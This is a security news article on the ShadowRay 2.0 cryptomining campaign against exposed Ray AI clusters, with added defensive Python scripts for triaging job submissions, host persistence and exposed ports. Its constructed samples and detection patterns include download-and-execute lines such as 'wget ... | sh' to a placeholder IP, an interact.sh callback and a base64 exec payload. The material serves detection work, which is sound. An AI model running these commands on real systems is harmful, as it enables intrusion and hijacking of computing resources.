Cybersecurity researchers have identified a global hacking campaign, dubbed ShadowRay 2.0, that is actively exploiting CVE-2023-48022 in the widely used Ray AI framework. The flaw is the absence of authentication on Ray's Jobs API and dashboard: anyone who can reach the dashboard port can submit a job, and a job is arbitrary code executed by the cluster. The ongoing attack silently takes over powerful AI computing clusters and repurposes them for cryptocurrency mining. The campaign is a significant escalation from the original ShadowRay activity Oligo disclosed in 2024, with attackers employing advanced tactics to remain undetected while maximizing illicit gains from compromised infrastructure.
Oligo Security researchers detailed the campaign, which began in early November 2025, and attribute it to threat actors operating under the moniker IronErn440. The attackers have weaponized Ray's legitimate orchestration features, turning them into tools for self-propagating attacks. The scale of the threat is substantial: by Oligo's count, the number of Ray servers exposed to the internet has surged from thousands at the time of the initial discovery to over 230,000 instances. The compromised servers frequently belong to active startups, research laboratories and cloud-hosting providers, creating a vast attack surface.
AI Attacking AI Infrastructure with ShadowRay 2.0 at its Core
The ShadowRay 2.0 attack unfolds in coordinated stages, beginning with reconnaissance through interact.sh. This out-of-band platform lets attackers confirm which servers are vulnerable without the traditional, easily detected port scanning: they submit a probe to Ray's unprotected Jobs API that calls back to an attacker-controlled interact.sh hostname, so a callback proves both that the instance is reachable and that it executes submitted code. Once targets are identified, they use the same unauthenticated dashboard to submit malicious jobs, which run arbitrary code as the account Ray runs under and can be scheduled onto any node in the cluster.
A particularly alarming aspect of this campaign is the use of AI-generated payloads. The attackers deploy custom Python code that autonomously discovers the cluster's available resources. To avoid tripping obvious alarms, the payloads claim only about 60 percent of CPU and GPU capacity before launching cryptocurrency miners disguised as legitimate system processes. The payloads' error handling and self-adaptation strongly suggest they were generated or refined with AI tools to speed up payload development and deployment.
The infection mechanism is multi-stage. The initial-access payload enumerates the cluster's nodes and uses Ray's NodeAffinitySchedulingStrategy, a scheduling option that pins a task to a specific node, to place a copy of the infection script on each of them. The snippet Oligo published shows exactly this: the code filters for nodes marked alive, then runs a wget command on each to download and execute an anonymized shell script.
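The job-submission and fan-out stages described above leave a trail in the cluster's own job records. The following is an added example (my code, not Oligo's and not part of Ray) that triages Ray job records for the indicators the campaign description gives: interact.sh callbacks, "download and run a shell script" entrypoints, and code that enumerates nodes or uses NodeAffinitySchedulingStrategy. The record fields (submission_id, entrypoint, runtime_env) follow the shape of Ray's Jobs API and `ray job list` output as documented; the sample records, the 198.51.100.7 address and the oast.* callback domains are constructed or assumed, and the encoded-payload rule is a generic heuristic of mine rather than something the report states.

```python
"""Heuristic triage of Ray job submissions (added example, not Oligo's or Ray's code).
Records mimic the fields returned by Ray's Jobs API (GET /api/jobs/, `ray job list`):
submission_id, entrypoint, runtime_env. Sample records below are constructed."""
from __future__ import annotations

import json
import re

# Each rule is (name, regex). The first three follow the campaign description
# (interact.sh callbacks, "wget ... | sh" staging, cluster fan-out). The
# encoded_payload rule is a generic obfuscation heuristic added on the
# assumption that legitimate training jobs rarely decode base64 in their
# entrypoint. The oast.* domains are interactsh's public servers as I know
# them; adjust to taste.
RULES = [
    ("oob_callback", re.compile(r"interact\.sh|\boast\.(?:fun|pro|live|site|online|me)\b")),
    ("download_and_execute", re.compile(r"\b(?:wget|curl)\b[^\n]*?(?:\||&&|;)\s*(?:ba)?sh\b")),
    ("node_fanout", re.compile(r"NodeAffinitySchedulingStrategy|ray\.nodes\(\)")),
    ("encoded_payload", re.compile(r"base64\s+(?:-d|--decode)|\bb64decode\(")),
]


def job_text(job: dict) -> str:
    """Flatten the attacker-controlled fields into one searchable string.
    runtime_env matters too: it can carry pip packages, env vars and a
    working_dir URL, all of which fetch or run code on the cluster."""
    return "\n".join([
        str(job.get("entrypoint", "")),
        json.dumps(job.get("runtime_env", {}), sort_keys=True),
    ])


def score_job(job: dict) -> list[str]:
    """Names of the rules this job trips, in RULES order."""
    text = job_text(job)
    return [name for name, rx in RULES if rx.search(text)]


def triage(jobs: list[dict]) -> dict[str, list[str]]:
    """Return {submission_id: [matched rules]} for every job that trips a rule."""
    hits = {}
    for job in jobs:
        matched = score_job(job)
        if matched:
            hits[job["submission_id"]] = matched
    return hits


# Constructed sample records (not real captures).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_train01",
     "entrypoint": "python train.py --epochs 10",
     "runtime_env": {"pip": ["torch==2.3.0"]}},
    {"submission_id": "raysubmit_recon01",
     "entrypoint": "curl -s http://c0ffee.interact.sh/ray",
     "runtime_env": {}},
    {"submission_id": "raysubmit_stage01",
     "entrypoint": "wget -qO- http://198.51.100.7/a.sh | sh",
     "runtime_env": {}},
    {"submission_id": "raysubmit_fanout01",
     "entrypoint": "python -c \"import base64,ray;exec(base64.b64decode('...'))\"",
     "runtime_env": {"env_vars": {"PAYLOAD": "ray.nodes()"}}},
]

if __name__ == "__main__":
    for sid, rules in triage(SAMPLE_JOBS).items():
        print(f"{sid}: {', '.join(rules)}")
```

In practice you would feed `triage()` the JSON from `GET /api/jobs/` on the head node (or the dashboard's job log) on a schedule; a single `oob_callback` hit on a cluster that should never reach the internet is worth a page on its own, because it means the reconnaissance stage already succeeded.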
Persistence is established through several vectors: cron jobs that run every fifteen minutes, hijacked systemd services, and SSH keys injected into root's authorized_keys. To camouflage their activity, the attackers rename malicious processes to mimic legitimate kernel worker threads such as "[kworker/0:0]" and DNS-filtering services, hiding in plain sight from anyone eyeballing a process list.
What distinguishes this campaign is the evident competition among attackers. The deployed scripts detect and terminate rival cryptocurrency miners. The attackers also block competing mining pools with iptables rules and /etc/hosts entries, and even target pools on specific ports known to be used by rival threat actors, pointing to a crowded underground ecosystem in which several criminal groups fight over the same compromised resources.
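The persistence and camouflage tricks in the two paragraphs above are all checkable from the host. Below is an added example (my code, not Oligo's and not from the campaign) that turns each of them into a small check: a process that calls itself a kernel worker but has a real executable, a cron entry that fetches and runs remote content every N minutes, /etc/hosts entries that sinkhole rival mining pools, and root authorized_keys entries that configuration management never installed. The kernel-thread test relies on the fact that genuine kernel threads are children of kthreadd (pid 2), have no readable /proc/<pid>/exe and an empty cmdline. All sample data is constructed; the key blobs, the 198.51.100.7 address and the example.invalid pool names are placeholders.

```python
"""Host triage for the persistence and camouflage tricks described above
(added example, not Oligo's or the campaign's code). Every check takes text
or plain records so it runs offline on the constructed samples at the bottom;
collect_procs() snapshots live /proc when the script is run on Linux."""
from __future__ import annotations

import os
import re

# Download-and-execute shape of the campaign's cron entries ("wget ... | sh").
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl)\b.*?(?:\||&&|;)\s*(?:ba)?sh\b")
# Names a user-space miner borrows to pass as a kernel thread ("[kworker/0:0]").
KTHREAD_NAME = re.compile(r"^\[?(?:kworker|ksoftirqd|kswapd|migration)\b")


def is_masquerading_kthread(proc: dict) -> bool:
    """A real kernel thread has ppid 2 (kthreadd), no readable exe link and an
    empty cmdline; a renamed miner fails at least one test. Without root the
    exe link of another user's process is unreadable, which can only produce
    a false negative, never a false positive."""
    claims = KTHREAD_NAME.match(proc["name"]) or KTHREAD_NAME.match(proc.get("cmdline") or "")
    if not claims:
        return False
    return (proc["ppid"] not in (0, 2)
            or proc.get("exe") is not None
            or bool(proc.get("cmdline")))


def suspicious_cron(text: str) -> list[str]:
    """Crontab lines that download-and-execute, or fetch remote content on a
    tight (*/N) or @reboot schedule."""
    flagged = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tight = line.startswith(("*/", "@reboot"))
        remote = re.search(r"\b(?:wget|curl)\b", line) is not None
        if DOWNLOAD_EXEC.search(line) or (tight and remote):
            flagged.append(line)
    return flagged


def sinkholed_hosts(text: str) -> list[str]:
    """Names pinned to 127.0.0.1/0.0.0.0 in /etc/hosts other than the usual
    loopback names: the campaign does this to starve rival miners of pools."""
    loopback = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
    names = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and fields[0] in ("127.0.0.1", "0.0.0.0"):
            names.extend(h for h in fields[1:] if h not in loopback)
    return names


def unexpected_root_keys(text: str, allowed: set[str]) -> list[str]:
    """Key blobs in authorized_keys that are not on the allow-list."""
    found = []
    for line in text.splitlines():
        toks = line.split()
        for i, tok in enumerate(toks[:-1]):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):  # options may precede the type
                if toks[i + 1] not in allowed:
                    found.append(toks[i + 1])
                break
    return found


def collect_procs() -> list[dict]:
    """Snapshot pid, comm, ppid, exe and cmdline from /proc (Linux only, else [])."""
    procs = []
    if not os.path.isdir("/proc"):
        return procs
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            name = stat[stat.index("(") + 1:stat.rindex(")")]   # comm, may contain spaces
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])  # field after the state letter
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = None  # kernel thread, or not ours to inspect
        except (OSError, ValueError):
            continue  # process exited mid-read or unparsable stat line
        procs.append({"pid": int(pid), "name": name, "ppid": ppid, "exe": exe, "cmdline": cmdline})
    return procs


# Constructed samples (not real captures).
SAMPLE_PROCS = [
    {"pid": 17, "name": "kworker/0:0", "ppid": 2, "exe": None, "cmdline": ""},
    {"pid": 4242, "name": "[kworker/0:0]", "ppid": 1, "exe": "/tmp/.x/miner", "cmdline": "[kworker/0:0]"},
]
SAMPLE_CRON = "# m h dom mon dow command\n0 2 * * * /usr/local/bin/backup.sh\n*/15 * * * * wget -q -O- http://198.51.100.7/a.sh | sh\n"
SAMPLE_HOSTS = "127.0.0.1 localhost\n::1 ip6-localhost ip6-loopback\n0.0.0.0 pool.example.invalid\n127.0.0.1 stratum.example.invalid # added by miner\n"
SAMPLE_KEYS = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKNOWN ops@example\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABINTRUDER root@box\n"
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIKNOWN"}

if __name__ == "__main__":
    procs = collect_procs() or SAMPLE_PROCS
    print("masquerading:", [p["pid"] for p in procs if is_masquerading_kthread(p)])
    print("cron:", suspicious_cron(SAMPLE_CRON))
    print("hosts:", sinkholed_hosts(SAMPLE_HOSTS))
    print("keys:", unexpected_root_keys(SAMPLE_KEYS, KNOWN_KEYS))
```

Run it as root on a suspect worker and feed the real files (`/etc/crontab`, `/etc/cron.d/*`, each user's crontab, `/etc/hosts`, `/root/.ssh/authorized_keys`) into the same functions; the systemd-hijacking vector the report mentions is best covered by comparing unit files against your package manager's manifests, which is distribution-specific and left out here.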
The adaptability of the attackers' infrastructure is also a concern. For victims in China, region-specific payloads are delivered through proxy services to circumvent network restrictions; the geolocation lookup uses services such as ip-api.com, and different scripts run for Chinese and international targets. The attackers update their payloads by committing changes to GitLab, treating their tooling as infrastructure as code. Because infected hosts evidently re-fetch the script from the repository rather than carrying a fixed copy, a single commit changes behaviour across the victim population without redeploying anything, which makes for a highly agile and adaptive threat.
The continuing evolution of ShadowRay 2.0 and the sheer number of exposed Ray instances indicate a persistent and growing threat to AI infrastructure. Organizations running Ray should review their deployments with one point in mind: Ray's maintainers have treated CVE-2023-48022 as intended behaviour for clusters on trusted networks and disputed the CVE, so upgrading alone does not close the hole. The dashboard and Jobs API (port 8265 by default) must not be reachable from untrusted networks, whether that means binding them to localhost, putting them behind an authenticating proxy, or restricting them with network policy; on top of that, monitor job submissions and hosts for the anomalies described above. Given how quickly this campaign adapts, vigilance and proactive hardening are essential for defending against these AI-centric attacks.
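Since the exposure, not a missing patch, is what puts a cluster in the 230,000, the first check to run is whether Ray's control-plane ports are listening on a wildcard address. The following added example (mine, not Ray's code) parses `ss -ltn` output and flags Ray's default ports when they are bound to all interfaces; the port numbers are Ray's documented defaults (8265 dashboard and Jobs API, 6379 GCS, 10001 Ray Client) and the sample output is constructed.

```python
"""Flag Ray control-plane ports bound to all interfaces (added example, not
Ray's code). Parses `ss -ltn` output; the sample below is constructed."""
from __future__ import annotations

import subprocess

# Ray's default ports: dashboard and Jobs API, GCS, and the Ray Client server.
# Ray's own security guidance assumes all of these sit on a trusted network.
RAY_PORTS = {8265: "dashboard / Jobs API", 6379: "GCS", 10001: "Ray Client"}
WILDCARD = {"0.0.0.0", "*", "::", "[::]"}


def exposed_listeners(ss_output: str) -> list[tuple[int, str, str]]:
    """(port, service, local_address) for each Ray port listening on a wildcard address."""
    findings = []
    for line in ss_output.splitlines()[1:]:  # first line is the column header
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        local = cols[3]                      # e.g. 0.0.0.0:8265 or [::]:10001
        addr, _, port = local.rpartition(":")
        if port.isdigit() and int(port) in RAY_PORTS and addr in WILDCARD:
            findings.append((int(port), RAY_PORTS[int(port)], local))
    return findings


def live_check() -> list[tuple[int, str, str]]:
    """Run ss on this host; returns [] where ss is unavailable."""
    try:
        out = subprocess.run(["ss", "-ltn"], capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return []
    return exposed_listeners(out)


# Constructed sample: dashboard and Ray Client exposed, GCS on loopback, sshd unrelated.
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:8265        0.0.0.0:*
LISTEN 0      128    127.0.0.1:6379      0.0.0.0:*
LISTEN 0      128    [::]:10001          [::]:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""

if __name__ == "__main__":
    for port, service, local in live_check() or exposed_listeners(SAMPLE_SS):
        print(f"EXPOSED {service} on {local}")
```

A hit on 8265 usually traces back to `ray start --head --dashboard-host=0.0.0.0` in a deployment template or container entrypoint; leaving `--dashboard-host` at its default of 127.0.0.1 and reaching the dashboard through an SSH tunnel or an authenticating reverse proxy removes the unauthenticated Jobs API from the network. Do the same for 6379 and 10001, which carry no authentication either.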

